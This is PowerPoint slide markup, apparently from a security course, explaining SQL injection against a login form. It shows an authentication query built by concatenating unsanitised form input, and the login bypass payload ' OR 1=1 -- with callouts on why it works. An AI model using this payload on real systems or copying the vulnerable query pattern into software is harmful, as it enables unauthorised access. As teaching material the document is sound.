            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8801100" y="3482976"/>
            <a:ext cx="1485900" cy="708025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>unintended query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA97A097-5FBE-6C49-A9EF-4F3F6638C123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4676776" y="3486150"/>
            <a:ext cx="2638425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>receive data from DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48142" name="Oval 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D796D1BA-AAA9-2B4A-BC43-01E5B45DDBFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3749676" y="2378076"/>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rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48143" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCAA99FA-DB8D-4545-B802-F59615339523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8731251" y="3090864"/>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rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48144" name="Oval 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4933013-6747-DE48-97B6-429701F9EDCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4300539" y="3505201"/>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rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14354" name="Freeform 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{730EE026-F6C9-9547-A532-C1757DC3D883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3676650" y="2773364"/>
            <a:ext cx="4400550" cy="1703387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T1" fmla="*/ 1703387 h 1703387"/>
              <a:gd name="T2" fmla="*/ 3295651 w 4400550"/>
              <a:gd name="T3" fmla="*/ 131762 h 1703387"/>
              <a:gd name="T4" fmla="*/ 0 w 4400550"/>
              <a:gd name="T5" fmla="*/ 912812 h 1703387"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4400550"/>
              <a:gd name="T10" fmla="*/ 0 h 1703387"/>
              <a:gd name="T11" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T12" fmla="*/ 1703387 h 1703387"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="4400550" h="1703387">
                <a:moveTo>
                  <a:pt x="4400550" y="1703387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4032250" y="1179512"/>
                  <a:pt x="4029076" y="263524"/>
                  <a:pt x="3295651" y="131762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2562226" y="0"/>
                  <a:pt x="1098550" y="601662"/>
                  <a:pt x="0" y="912812"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48147" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E86DE0-CE42-1549-A7FB-836D36217D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1028701" y="4619627"/>
            <a:ext cx="6172200" cy="1581150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342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indent="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This is an </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>input validation </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> user input in SQL query to back-end database changes the meaning of query</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425900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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C04A9A-BBD3-D348-918E-3190A8F66033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Authentication with Back-End DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65EED48E-1579-0C4C-9CFA-4E158EA6FBE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=execute(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        “SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        username=‘ ”  &amp;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form(“user”)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; “ ′ AND   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        password= ‘ ”  &amp;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; “ ′ ” );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserFound.EOF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       Authentication correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   else Fail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49158" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CACACBD-5C45-6340-8498-B7E6D26A9DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5088341" y="4411640"/>
            <a:ext cx="2936543" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -88142"/>
              <a:gd name="adj2" fmla="val -42167"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="1270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Only true if the result of SQL query is not empty, i.e., user/pwd is in the database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E656312-AE0C-7C43-BA59-DC1FDCACC790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446292" y="2505670"/>
            <a:ext cx="4321791" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>User supplies username and password, this SQL query checks if user/password combination is in the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26147491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15DC03A9-A8D0-364C-8EAC-9B01D4CB9FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Using SQL Injection to Log In</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50180" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF62C794-9D36-2C4B-B0C7-B0E525789778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="8090848" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User gives username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>′ OR 1=1 --</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Web server executes query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=execute(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> records match the query, so the result is not empty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>correct “authentication”!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50181" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E121A03C-34EE-B84A-9C76-3CB605D3556E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3269776" y="4780105"/>
            <a:ext cx="1179394" cy="286232"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20833"/>
              <a:gd name="adj2" fmla="val -103477"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99CC"/>
          </a:solidFill>
          <a:ln w="1270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90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Always true!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50182" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C09FBB26-281D-4C4D-AEBE-060997F87528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="4780105"/>
            <a:ext cx="2419066" cy="286232"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -47538"/>
              <a:gd name="adj2" fmla="val -110422"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99CC"/>
          </a:solidFill>
          <a:ln w="1270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90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Everything after -- is ignored!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379916548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9C7F8FCC-C539-1149-B08E-05C5A704A076}"/>
